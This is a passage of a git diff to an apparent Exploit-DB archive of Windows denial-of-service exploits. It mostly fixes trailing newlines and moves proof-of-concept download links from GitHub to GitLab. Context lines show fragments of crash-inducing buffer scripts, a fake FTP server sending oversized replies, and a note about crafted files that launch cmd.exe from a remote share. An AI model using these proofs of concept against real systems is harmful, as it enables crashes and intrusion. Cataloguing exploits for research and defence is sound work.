Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42758.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42758.zip \ No newline at end of file diff --git a/exploits/windows/dos/42763.html b/exploits/windows/dos/42763.html index ed535c72c..eeac3a9d1 100644 --- a/exploits/windows/dos/42763.html +++ b/exploits/windows/dos/42763.html @@ -19,4 +19,4 @@ function f() { } = {}); } -f(); +f(); \ No newline at end of file diff --git a/exploits/windows/dos/42764.html b/exploits/windows/dos/42764.html index f4f398b0a..3a673a37e 100644 --- a/exploits/windows/dos/42764.html +++ b/exploits/windows/dos/42764.html @@ -82,4 +82,4 @@ let h = function f(a0 = (function () { for (let i = 0; i < 0x10000; i++) { h(); -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42917.py b/exploits/windows/dos/42917.py index 53bf2445a..615ad07a2 100755 --- a/exploits/windows/dos/42917.py +++ b/exploits/windows/dos/42917.py @@ -29,4 +29,4 @@ b = junk+EIP+"D"*500 f = open('buffer.txt','w') f.write(b) -f.close() +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/42962.py b/exploits/windows/dos/42962.py index b774cb24f..3f1309f36 100755 --- a/exploits/windows/dos/42962.py +++ b/exploits/windows/dos/42962.py @@ -33,4 +33,4 @@ while True: print(conn.recv(1024)) conn.send('230 OK\r\n') print(conn.recv(1024)) - conn.send('220 "'+buffer+'" is current directory\r\n') + conn.send('220 "'+buffer+'" is current directory\r\n') \ No newline at end of file diff --git a/exploits/windows/dos/42994.txt b/exploits/windows/dos/42994.txt index a742af291..64cdf25c0 100644 --- a/exploits/windows/dos/42994.txt +++ b/exploits/windows/dos/42994.txt @@ -78,6 +78,4 @@ machine. That´s it, now just open the 'GLK' files. Both 'cmd.exe' and the CPL file should be executed/loaded. Notice the files located in the remote share will take longer than 'CMD.exe' to be executed for obvious -reasons, just wait a few seconds. - - +reasons, just wait a few seconds. \ No newline at end of file diff --git a/exploits/windows/dos/42995.txt b/exploits/windows/dos/42995.txt index e606c00e8..cd7b63f56 100644 --- a/exploits/windows/dos/42995.txt +++ b/exploits/windows/dos/42995.txt @@ -33,4 +33,4 @@ chars long, so we could still fake/spoof it as another Office app (the app name Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42995.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42995.zip \ No newline at end of file diff --git a/exploits/windows/dos/42997.txt b/exploits/windows/dos/42997.txt index faa3dca85..9e628b62e 100644 --- a/exploits/windows/dos/42997.txt +++ b/exploits/windows/dos/42997.txt @@ -31,4 +31,4 @@ The class creation succeeded and the HTML file executed notepad. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42997.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42997.zip \ No newline at end of file diff --git a/exploits/windows/dos/43001.cpp b/exploits/windows/dos/43001.cpp index ff2809e93..0a2ec3f0f 100644 --- a/exploits/windows/dos/43001.cpp +++ b/exploits/windows/dos/43001.cpp @@ -120,4 +120,4 @@ int main() { CloseHandle(hFile); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/43026.py b/exploits/windows/dos/43026.py index 5748b8c22..90846e0c9 100755 --- a/exploits/windows/dos/43026.py +++ b/exploits/windows/dos/43026.py @@ -58,5 +58,4 @@ def main(): t.start() if __name__ == '__main__': - main() - + main() \ No newline at end of file diff --git a/exploits/windows/dos/43058.c b/exploits/windows/dos/43058.c index a0bbf309b..f2844353e 100644 --- a/exploits/windows/dos/43058.c +++ b/exploits/windows/dos/43058.c @@ -133,9 +133,4 @@ int main(int argc, char *argv[]) CloseHandle(hDevice); return 0; -} - - - - - +} \ No newline at end of file diff --git a/exploits/windows/dos/43060.py b/exploits/windows/dos/43060.py index cb7d46fb4..3762d17b9 100755 --- a/exploits/windows/dos/43060.py +++ b/exploits/windows/dos/43060.py @@ -173,4 +173,4 @@ def main(): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/exploits/windows/dos/43124.py b/exploits/windows/dos/43124.py index f39625021..acc597fc4 100755 --- a/exploits/windows/dos/43124.py +++ b/exploits/windows/dos/43124.py @@ -22,6 +22,4 @@ crash = "A"*24538 #crashes on 24538, but more will do writeFile = open (file, "w") writeFile.write( crash ) -writeFile.close() - - +writeFile.close() \ No newline at end of file diff --git a/exploits/windows/dos/4335.txt b/exploits/windows/dos/4335.txt index 97e2676a6..03c9879fa 100644 --- a/exploits/windows/dos/4335.txt +++ b/exploits/windows/dos/4335.txt @@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit 3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process. 4 . the otherside's yahoo! messenger will be crashed. -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4335.rar (08292007-expyahoo.rar) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4335.rar (08292007-expyahoo.rar) # milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/exploits/windows/dos/43373.txt b/exploits/windows/dos/43373.txt index 19f73257b..c128aa591 100644 --- a/exploits/windows/dos/43373.txt +++ b/exploits/windows/dos/43373.txt @@ -90,4 +90,4 @@ The service tries to execute invalid memory at 0x18181818 (or at least crashes o Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43373.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43373.zip \ No newline at end of file diff --git a/exploits/windows/dos/43446.txt b/exploits/windows/dos/43446.txt index 794af443a..74a1033dd 100644 --- a/exploits/windows/dos/43446.txt +++ b/exploits/windows/dos/43446.txt @@ -109,4 +109,4 @@ There is the text I set via SetWindowText(). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43446.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43446.zip \ No newline at end of file diff --git a/exploits/windows/dos/43515.txt b/exploits/windows/dos/43515.txt index 3aef1e74a..b48d82c2c 100644 --- a/exploits/windows/dos/43515.txt +++ b/exploits/windows/dos/43515.txt @@ -37,4 +37,4 @@ Observed Result: The Non-AC anonymous token is impersonated. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43515.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43515.zip \ No newline at end of file diff --git a/exploits/windows/dos/43516.txt b/exploits/windows/dos/43516.txt index 699a7a195..ef8dd5998 100644 --- a/exploits/windows/dos/43516.txt +++ b/exploits/windows/dos/43516.txt @@ -25,4 +25,4 @@ The anonymous token is a normal AC. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43516.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43516.zip \ No newline at end of file diff --git a/exploits/windows/dos/43517.txt b/exploits/windows/dos/43517.txt index 044881c97..933f43364 100644 --- a/exploits/windows/dos/43517.txt +++ b/exploits/windows/dos/43517.txt @@ -33,4 +33,4 @@ The direct open fails with STATUS_IO_REPARSE_DATA_INVALID however the one via SM Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43517.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43517.zip \ No newline at end of file diff --git a/exploits/windows/dos/4375.txt b/exploits/windows/dos/4375.txt index 56c326618..e56b65cdc 100644 --- a/exploits/windows/dos/4375.txt +++ b/exploits/windows/dos/4375.txt @@ -1,5 +1,5 @@ BaoFeng2 Mps.dll Activex Multiple Remote Buffer Overflow PoC -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4375.zip (09082007-storm.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4375.zip (09082007-storm.zip) # milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/exploits/windows/dos/44096.txt b/exploits/windows/dos/44096.txt index 8d4b6b475..161f3f8d2 100644 --- a/exploits/windows/dos/44096.txt +++ b/exploits/windows/dos/44096.txt @@ -193,4 +193,4 @@ A screenshot of WinDBG showing this final step is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44096.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44096.zip \ No newline at end of file diff --git a/exploits/windows/dos/44402.txt b/exploits/windows/dos/44402.txt index 518623030..3dd0224e2 100644 --- a/exploits/windows/dos/44402.txt +++ b/exploits/windows/dos/44402.txt @@ -49,4 +49,4 @@ A minimal sample RAR file that exhibits these traits & causes mpengine to corrup Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44402.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44402.zip \ No newline at end of file diff --git a/exploits/windows/dos/44466.txt b/exploits/windows/dos/44466.txt index 950f263d2..689f84145 100644 --- a/exploits/windows/dos/44466.txt +++ b/exploits/windows/dos/44466.txt @@ -45,4 +45,4 @@ The signing level cache is applied to the file with no further verification. You Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44466.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44466.zip \ No newline at end of file diff --git a/exploits/windows/dos/44467.txt b/exploits/windows/dos/44467.txt index 648158f27..33d7d3176 100644 --- a/exploits/windows/dos/44467.txt +++ b/exploits/windows/dos/44467.txt @@ -70,4 +70,4 @@ The issue was identified by James Forshaw and Ivan Fratric. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44467.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44467.zip \ No newline at end of file diff --git a/exploits/windows/dos/44914.txt b/exploits/windows/dos/44914.txt index 9bbbfede7..1b02a1895 100644 --- a/exploits/windows/dos/44914.txt +++ b/exploits/windows/dos/44914.txt @@ -47,4 +47,4 @@ The directories are created, the application will still fail. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44914.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44914.zip \ No newline at end of file diff --git a/exploits/windows/dos/44915.txt b/exploits/windows/dos/44915.txt index 5f15991f7..acbd91755 100644 --- a/exploits/windows/dos/44915.txt +++ b/exploits/windows/dos/44915.txt @@ -36,4 +36,4 @@ The file badgers.dll is created in the system32 folder which is writable by a no Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44915.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44915.zip \ No newline at end of file diff --git a/exploits/windows/dos/45435.txt b/exploits/windows/dos/45435.txt index 87e164d30..9f035e2ab 100644 --- a/exploits/windows/dos/45435.txt +++ b/exploits/windows/dos/45435.txt @@ -38,4 +38,4 @@ The signing level cache is applied to the file with no further verification. You Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45435.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45435.zip \ No newline at end of file diff --git a/exploits/windows/dos/45436.txt b/exploits/windows/dos/45436.txt index 066825873..64097e098 100644 --- a/exploits/windows/dos/45436.txt +++ b/exploits/windows/dos/45436.txt @@ -259,4 +259,4 @@ The object’s reference count is corrupted. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45436.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45436.zip \ No newline at end of file diff --git a/exploits/windows/dos/45624.txt b/exploits/windows/dos/45624.txt index 8e1a07f35..d24981871 100644 --- a/exploits/windows/dos/45624.txt +++ b/exploits/windows/dos/45624.txt @@ -24,4 +24,4 @@ The files owned by the user are listed to the console. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45624.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45624.zip \ No newline at end of file diff --git a/exploits/windows/dos/46022.txt b/exploits/windows/dos/46022.txt index 659395436..a21554564 100644 --- a/exploits/windows/dos/46022.txt +++ b/exploits/windows/dos/46022.txt @@ -57,4 +57,4 @@ leak2.html demonstrates this and leak2.txt contains the debug log (obtained in a Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46022.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46022.zip \ No newline at end of file diff --git a/exploits/windows/dos/46023.txt b/exploits/windows/dos/46023.txt index 43828c007..8ae976ce6 100644 --- a/exploits/windows/dos/46023.txt +++ b/exploits/windows/dos/46023.txt @@ -8,4 +8,4 @@ This has been tested on Windows 10 Version 1803 with the latest patches applied Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46023.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46023.zip \ No newline at end of file diff --git a/exploits/windows/dos/46184.txt b/exploits/windows/dos/46184.txt index 295ba123a..c3603c2e1 100644 --- a/exploits/windows/dos/46184.txt +++ b/exploits/windows/dos/46184.txt @@ -69,4 +69,4 @@ The unmarshal process succeeds and the second call to obj.FullPath fails with an Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46184.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46184.zip \ No newline at end of file diff --git a/exploits/windows/dos/47028.txt b/exploits/windows/dos/47028.txt index 68c2d15f8..1c0a6aa63 100644 --- a/exploits/windows/dos/47028.txt +++ b/exploits/windows/dos/47028.txt @@ -39,4 +39,4 @@ The arbitrary directory was created and is writable by the current user. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47028.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47028.zip \ No newline at end of file diff --git a/exploits/windows/dos/47029.txt b/exploits/windows/dos/47029.txt index 8f6c01642..ec11a7506 100644 --- a/exploits/windows/dos/47029.txt +++ b/exploits/windows/dos/47029.txt @@ -67,4 +67,4 @@ The event buffer section object can be duplicated back to writable and the event Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47029.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47029.zip \ No newline at end of file diff --git a/exploits/windows/dos/47084.txt b/exploits/windows/dos/47084.txt index 0157d8d49..ff0f7d5ae 100644 --- a/exploits/windows/dos/47084.txt +++ b/exploits/windows/dos/47084.txt @@ -69,4 +69,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47084.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47084.zip \ No newline at end of file diff --git a/exploits/windows/dos/47086.txt b/exploits/windows/dos/47086.txt index 115433230..a51cef395 100644 --- a/exploits/windows/dos/47086.txt +++ b/exploits/windows/dos/47086.txt @@ -147,4 +147,4 @@ Evaluate expression: 934781566928 = 000000d9`a552bfd0 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47086.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47086.zip \ No newline at end of file diff --git a/exploits/windows/dos/47087.txt b/exploits/windows/dos/47087.txt index 17145e714..ab12d135c 100644 --- a/exploits/windows/dos/47087.txt +++ b/exploits/windows/dos/47087.txt @@ -227,4 +227,4 @@ Where the t2cstr.c:992 line is: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47087.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47087.zip \ No newline at end of file diff --git a/exploits/windows/dos/47088.txt b/exploits/windows/dos/47088.txt index 4f720c789..27313a02c 100644 --- a/exploits/windows/dos/47088.txt +++ b/exploits/windows/dos/47088.txt @@ -162,4 +162,4 @@ TEB at 0000000b2b0ae000 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47088.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47088.zip \ No newline at end of file diff --git a/exploits/windows/dos/47089.txt b/exploits/windows/dos/47089.txt index 8172af585..c20c50b36 100644 --- a/exploits/windows/dos/47089.txt +++ b/exploits/windows/dos/47089.txt @@ -139,4 +139,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47089.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47089.zip \ No newline at end of file diff --git a/exploits/windows/dos/47090.txt b/exploits/windows/dos/47090.txt index b8da0b807..f1561272a 100644 --- a/exploits/windows/dos/47090.txt +++ b/exploits/windows/dos/47090.txt @@ -158,4 +158,4 @@ $1 = (dnaCtx) 0xbebebebebebebebe Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47090.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47090.zip \ No newline at end of file diff --git a/exploits/windows/dos/47091.txt b/exploits/windows/dos/47091.txt index 8a55bca51..c2c876a77 100644 --- a/exploits/windows/dos/47091.txt +++ b/exploits/windows/dos/47091.txt @@ -174,4 +174,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47091.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47091.zip \ No newline at end of file diff --git a/exploits/windows/dos/47092.txt b/exploits/windows/dos/47092.txt index 717f5f8b7..8aa892a63 100644 --- a/exploits/windows/dos/47092.txt +++ b/exploits/windows/dos/47092.txt @@ -204,4 +204,4 @@ DWrite!t2Decode+0x119c: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47092.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47092.zip \ No newline at end of file diff --git a/exploits/windows/dos/47093.txt b/exploits/windows/dos/47093.txt index ee07095b0..a7ba6fbee 100644 --- a/exploits/windows/dos/47093.txt +++ b/exploits/windows/dos/47093.txt @@ -136,4 +136,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47093.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47093.zip \ No newline at end of file diff --git a/exploits/windows/dos/47094.txt b/exploits/windows/dos/47094.txt index a10f261dc..ec6d8a27e 100644 --- a/exploits/windows/dos/47094.txt +++ b/exploits/windows/dos/47094.txt @@ -191,4 +191,4 @@ Evaluate expression: 130968 = 00000000`0001ff98 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47094.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47094.zip \ No newline at end of file diff --git a/exploits/windows/dos/47095.txt b/exploits/windows/dos/47095.txt index dc858a046..1ee7febb3 100644 --- a/exploits/windows/dos/47095.txt +++ b/exploits/windows/dos/47095.txt @@ -248,4 +248,4 @@ Evaluate expression: 2547 = 00000000`000009f3 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47095.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47095.zip \ No newline at end of file diff --git a/exploits/windows/dos/47096.txt b/exploits/windows/dos/47096.txt index a6d7fe502..a7ddf1696 100644 --- a/exploits/windows/dos/47096.txt +++ b/exploits/windows/dos/47096.txt @@ -178,4 +178,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47096.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47096.zip \ No newline at end of file diff --git a/exploits/windows/dos/47097.txt b/exploits/windows/dos/47097.txt index 099fc7ef3..242024e33 100644 --- a/exploits/windows/dos/47097.txt +++ b/exploits/windows/dos/47097.txt @@ -269,4 +269,4 @@ DWrite!srcSeek: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47097.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47097.zip \ No newline at end of file diff --git a/exploits/windows/dos/47098.txt b/exploits/windows/dos/47098.txt index 24cfbb19f..ffab6e77f 100644 --- a/exploits/windows/dos/47098.txt +++ b/exploits/windows/dos/47098.txt @@ -300,4 +300,4 @@ DWrite!fillSet+0x33: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47098.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47098.zip \ No newline at end of file diff --git a/exploits/windows/dos/47099.txt b/exploits/windows/dos/47099.txt index 2f50ec245..a023d15be 100644 --- a/exploits/windows/dos/47099.txt +++ b/exploits/windows/dos/47099.txt @@ -162,4 +162,4 @@ Evaluate expression: 5457134919 = 00000001`45454547 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47099.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47099.zip \ No newline at end of file diff --git a/exploits/windows/dos/47100.txt b/exploits/windows/dos/47100.txt index 00f4d1048..071a26827 100644 --- a/exploits/windows/dos/47100.txt +++ b/exploits/windows/dos/47100.txt @@ -183,4 +183,4 @@ Evaluate expression: 65535 = 00000000`0000ffff Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47100.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47100.zip \ No newline at end of file diff --git a/exploits/windows/dos/47101.txt b/exploits/windows/dos/47101.txt index 13db512dd..0bce63ffd 100644 --- a/exploits/windows/dos/47101.txt +++ b/exploits/windows/dos/47101.txt @@ -373,4 +373,4 @@ Evaluate expression: 50 = 00000000`00000032 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47101.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47101.zip \ No newline at end of file diff --git a/exploits/windows/dos/47102.txt b/exploits/windows/dos/47102.txt index f2abc151b..a58ff885d 100644 --- a/exploits/windows/dos/47102.txt +++ b/exploits/windows/dos/47102.txt @@ -260,4 +260,4 @@ eax 0x100 256 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47102.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47102.zip \ No newline at end of file diff --git a/exploits/windows/dos/47103.txt b/exploits/windows/dos/47103.txt index 55a11a90b..8cb03b97d 100644 --- a/exploits/windows/dos/47103.txt +++ b/exploits/windows/dos/47103.txt @@ -200,4 +200,4 @@ Evaluate expression: 1883117648224 = 000001b6`728ef960 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47103.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47103.zip \ No newline at end of file diff --git a/exploits/windows/dos/47113.txt b/exploits/windows/dos/47113.txt index c8822b843..117b0a5e0 100644 --- a/exploits/windows/dos/47113.txt +++ b/exploits/windows/dos/47113.txt @@ -59,4 +59,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47113.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47113.zip \ No newline at end of file diff --git a/exploits/windows/dos/47259.txt b/exploits/windows/dos/47259.txt index e4faf07a3..9c94099f2 100644 --- a/exploits/windows/dos/47259.txt +++ b/exploits/windows/dos/47259.txt @@ -202,4 +202,4 @@ cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47259.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47259.zip \ No newline at end of file diff --git a/exploits/windows/dos/47260.txt b/exploits/windows/dos/47260.txt index b667b4742..8b8043466 100644 --- a/exploits/windows/dos/47260.txt +++ b/exploits/windows/dos/47260.txt @@ -211,4 +211,4 @@ And it is clear that almost none of the memory under [EAX] is initialized at the Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47260.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47260.zip \ No newline at end of file diff --git a/exploits/windows/dos/47261.txt b/exploits/windows/dos/47261.txt index 16a462fbe..bc08fd5d2 100644 --- a/exploits/windows/dos/47261.txt +++ b/exploits/windows/dos/47261.txt @@ -74,4 +74,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47261.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47261.zip \ No newline at end of file diff --git a/exploits/windows/dos/47262.txt b/exploits/windows/dos/47262.txt index 772c53ce5..c804006cd 100644 --- a/exploits/windows/dos/47262.txt +++ b/exploits/windows/dos/47262.txt @@ -66,4 +66,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47262.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47262.zip \ No newline at end of file diff --git a/exploits/windows/dos/47263.txt b/exploits/windows/dos/47263.txt index 446d5d32c..c30aedbe1 100644 --- a/exploits/windows/dos/47263.txt +++ b/exploits/windows/dos/47263.txt @@ -59,4 +59,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47263.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47263.zip \ No newline at end of file diff --git a/exploits/windows/dos/47264.txt b/exploits/windows/dos/47264.txt index d59df5fab..2ec19b7c6 100644 --- a/exploits/windows/dos/47264.txt +++ b/exploits/windows/dos/47264.txt @@ -59,4 +59,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47264.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47264.zip \ No newline at end of file diff --git a/exploits/windows/dos/47265.txt b/exploits/windows/dos/47265.txt index 4ceb093ff..fbda700c3 100644 --- a/exploits/windows/dos/47265.txt +++ b/exploits/windows/dos/47265.txt @@ -57,4 +57,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47265.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47265.zip \ No newline at end of file diff --git a/exploits/windows/dos/47266.txt b/exploits/windows/dos/47266.txt index 85e6b882c..5b2b98157 100644 --- a/exploits/windows/dos/47266.txt +++ b/exploits/windows/dos/47266.txt @@ -56,4 +56,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47266.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47266.zip \ No newline at end of file diff --git a/exploits/windows/dos/47267.txt b/exploits/windows/dos/47267.txt index b6254279f..0781ab58f 100644 --- a/exploits/windows/dos/47267.txt +++ b/exploits/windows/dos/47267.txt @@ -58,4 +58,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47267.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47267.zip \ No newline at end of file diff 